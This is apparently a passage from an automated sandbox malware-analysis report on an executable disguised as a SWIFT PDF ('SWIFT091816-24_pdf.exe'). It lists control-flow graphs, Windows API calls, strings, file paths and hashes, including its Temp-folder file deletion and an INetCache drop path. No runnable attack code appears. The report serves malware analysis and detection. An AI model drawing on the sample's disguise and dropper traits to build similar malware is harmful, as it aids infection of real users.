313->293 323 403d5c-403d66 313->323 325 403d48 314->325 323->325 325->304 327->328 331 403f27-403f28 328->331 332 403f2a 328->332 333 403f2c-403f5a GetSystemMenu EnableMenuItem SendMessageW 331->333 332->333 334 403f5c-403f6d SendMessageW 333->334 335 403f6f 333->335 336 403f75-403fb3 call 40414e call 406055 lstrlenW call 406077 SetWindowTextW call 401389 334->336 335->336 336->275 345 403fb9-403fbb 336->345 345->275 346 403fc1-403fc5 345->346 347 403fe4-403ff8 DestroyWindow 346->347 348 403fc7-403fcd 346->348 347->283 350 403ffe-40402b CreateDialogParamW 347->350 348->274 349 403fd3-403fd9 348->349 349->275 351 403fdf 349->351 350->283 352 404031-404088 call 404119 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 350->352 351->274 352->274 357 40408a-4040a2 ShowWindow call 404165 352->357 357->283
                                                                                                                                APIs
                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                                                • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                                                • DestroyWindow.USER32 ref: 00403CAE
                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
                                                                                                                                • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000001), ref: 00403F52
                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                                                • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3282139019-0
                                                                                                                                • Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                                                • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                                                • Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                                                • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                • GlobalAlloc.KERNELBASE(?,00001CA4), ref: 10001C24
                                                                                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2471251623.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2471237821.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2471265197.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2471278641.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4227406936-0
                                                                                                                                • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                                • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                                                • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                                • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 700 406077-406082 701 406084-406093 700->701 702 406095-4060ab 700->702 701->702 703 4060b1-4060be 702->703 704 4062c3-4062c9 702->704 703->704 705 4060c4-4060cb 703->705 706 4060d0-4060dd 704->706 707 4062cf-4062da 704->707 705->704 706->707 708 4060e3-4060ef 706->708 709 4062e5-4062e6 707->709 710 4062dc-4062e0 call 406055 707->710 711 4062b0 708->711 712 4060f5-406131 708->712 710->709 714 4062b2-4062bc 711->714 715 4062be-4062c1 711->715 716 406251-406255 712->716 717 406137-406142 GetVersion 712->717 714->704 715->704 720 406257-40625b 716->720 721 40628a-40628e 716->721 718 406144-406148 717->718 719 40615c 717->719 718->719 724 40614a-40614e 718->724 727 406163-40616a 719->727 725 40626b-406278 call 406055 720->725 726 40625d-406269 call 405f9c 720->726 722 406290-406298 call 406077 721->722 723 40629d-4062ae lstrlenW 721->723 722->723 723->704 724->719 729 406150-406154 724->729 738 40627d-406286 725->738 726->738 731 40616c-40616e 727->731 732 40616f-406171 727->732 729->719 734 406156-40615a 729->734 731->732 736 406173-406199 call 405f22 732->736 737 4061ad-4061b0 732->737 734->727 749 406238-40623c 736->749 750 40619f-4061a8 call 406077 736->750 739 4061c0-4061c3 737->739 740 4061b2-4061be GetSystemDirectoryW 737->740 738->723 742 406288 738->742 744 4061c5-4061d3 GetWindowsDirectoryW 739->744 745 40622e-406230 739->745 743 406232-406236 740->743 747 406249-40624f call 4062e9 742->747 743->747 743->749 744->745 745->743 748 4061d5-4061df 745->748 747->723 755 4061e1-4061e4 748->755 756 4061f9-40620f SHGetSpecialFolderLocation 748->756 749->747 753 40623e-406244 lstrcatW 749->753 750->743 753->747 755->756 758 4061e6-4061ed 755->758 759 406211-406228 SHGetPathFromIDListW CoTaskMemFree 756->759 760 40622a 756->760 761 4061f5-4061f7 758->761 759->743 759->760 760->745 761->743 761->756
                                                                                                                                APIs
                                                                                                                                • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040613A
                                                                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B8
                                                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061CB
                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                                                • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406215
                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                                                • lstrlenW.KERNEL32(Call,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040629E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                • API String ID: 900638850-1230650788
                                                                                                                                • Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                                                • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                                                • Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                                                • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 762 405846-40586c call 405b11 765 405885-40588c 762->765 766 40586e-405880 DeleteFileW 762->766 768 40588e-405890 765->768 769 40589f-4058af call 406055 765->769 767 405a02-405a06 766->767 770 4059b0-4059b5 768->770 771 405896-405899 768->771 775 4058b1-4058bc lstrcatW 769->775 776 4058be-4058bf call 405a55 769->776 770->767 774 4059b7-4059ba 770->774 771->769 771->770 777 4059c4-4059cc call 406398 774->777 778 4059bc-4059c2 774->778 779 4058c4-4058c8 775->779 776->779 777->767 785 4059ce-4059e2 call 405a09 call 4057fe 777->785 778->767 782 4058d4-4058da lstrcatW 779->782 783 4058ca-4058d2 779->783 786 4058df-4058fb lstrlenW FindFirstFileW 782->786 783->782 783->786 802 4059e4-4059e7 785->802 803 4059fa-4059fd call 4051b4 785->803 788 405901-405909 786->788 789 4059a5-4059a9 786->789 790 405929-40593d call 406055 788->790 791 40590b-405913 788->791 789->770 793 4059ab 789->793 804 405954-40595f call 4057fe 790->804 805 40593f-405947 790->805 794 405915-40591d 791->794 795 405988-405998 FindNextFileW 791->795 793->770 794->790 798 40591f-405927 794->798 795->788 801 40599e-40599f FindClose 795->801 798->790 798->795 801->789 802->778 806 4059e9-4059f8 call 4051b4 call 405ef6 802->806 803->767 815 405980-405983 call 4051b4 804->815 816 405961-405964 804->816 805->795 807 405949-405952 call 405846 805->807 806->767 807->795 815->795 819 405966-405976 call 4051b4 call 405ef6 816->819 820 405978-40597e 816->820 819->795 820->795
                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"), ref: 0040586F
                                                                                                                                • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"), ref: 004058B7
                                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"), ref: 004058DA
                                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"), ref: 004058E0
                                                                                                                                • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"), ref: 004058F0
                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                                                Strings
                                                                                                                                • \*.*, xrefs: 004058B1
                                                                                                                                • "C:\Users\user\Desktop\SWIFT091816-24_pdf.exe", xrefs: 0040584F
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                • String ID: "C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                • API String ID: 2035342205-4064433139
                                                                                                                                • Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                                                • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                                                • Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                                                • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                                                APIs
                                                                                                                                • CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,?), ref: 00402114
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving, xrefs: 00402154
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateInstance
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving
                                                                                                                                • API String ID: 542301482-2168965836
                                                                                                                                • Opcode ID: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                                                • Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
                                                                                                                                • Opcode Fuzzy Hash: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                                                • Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNELBASE(74DF3420,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004063AF
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                • Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                                                • Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
                                                                                                                                • Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                                                • Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFindFirst
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                • Opcode ID: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                                                • Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
                                                                                                                                • Opcode Fuzzy Hash: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                                                • Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 360 40389e-4038b6 call 40642b 363 4038b8-4038c3 GetUserDefaultUILanguage call 405f9c 360->363 364 4038ca-403901 call 405f22 360->364 367 4038c8 363->367 370 403903-403914 call 405f22 364->370 371 403919-40391f lstrcatW 364->371 369 403924-40394d call 403b74 call 405b11 367->369 377 403953-403958 369->377 378 4039df-4039e7 call 405b11 369->378 370->371 371->369 377->378 379 40395e-403986 call 405f22 377->379 384 4039f5-403a1a LoadImageW 378->384 385 4039e9-4039f0 call 406077 378->385 379->378 386 403988-40398c 379->386 388 403a9b-403aa3 call 40140b 384->388 389 403a1c-403a4c RegisterClassW 384->389 385->384 391 40399e-4039aa lstrlenW 386->391 392 40398e-40399b call 405a36 386->392 401 403aa5-403aa8 388->401 402 403aad-403ab8 call 403b74 388->402 393 403a52-403a96 SystemParametersInfoW CreateWindowExW 389->393 394 403b6a 389->394 398 4039d2-4039da call 405a09 call 406055 391->398 399 4039ac-4039ba lstrcmpiW 391->399 392->391 393->388 397 403b6c-403b73 394->397 398->378 399->398 400 4039bc-4039c6 GetFileAttributesW 399->400 405 4039c8-4039ca 400->405 406 4039cc-4039cd call 405a55 400->406 401->397 412 403b41-403b49 call 405287 402->412 413 403abe-403ad8 ShowWindow call 4063bf 402->413 405->398 405->406 406->398 418 403b63-403b65 call 40140b 412->418 419 403b4b-403b51 412->419 420 403ae4-403af6 GetClassInfoW 413->420 421 403ada-403adf call 4063bf 413->421 418->394 419->401 422 403b57-403b5e call 40140b 419->422 425 403af8-403b08 GetClassInfoW RegisterClassW 420->425 426 403b0e-403b31 DialogBoxParamW call 40140b 420->426 421->420 422->401 425->426 429 403b36-403b3f call 4037ee 426->429 429->397
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,?,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                  • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"), ref: 004038B8
                                                                                                                                  • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                                • lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"), ref: 0040391F
                                                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
                                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                                                • GetFileAttributesW.KERNEL32(Call), ref: 004039BD
                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving), ref: 00403A06
                                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                                                • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403A5B
                                                                                                                                • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2463815813.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2463797325.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463835051.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2463853020.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2464196285.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                • String ID: "C:\Users\user\Desktop\SWIFT091816-24_pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                • API String ID: 606308-1100091151
                                                                                                                                • Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
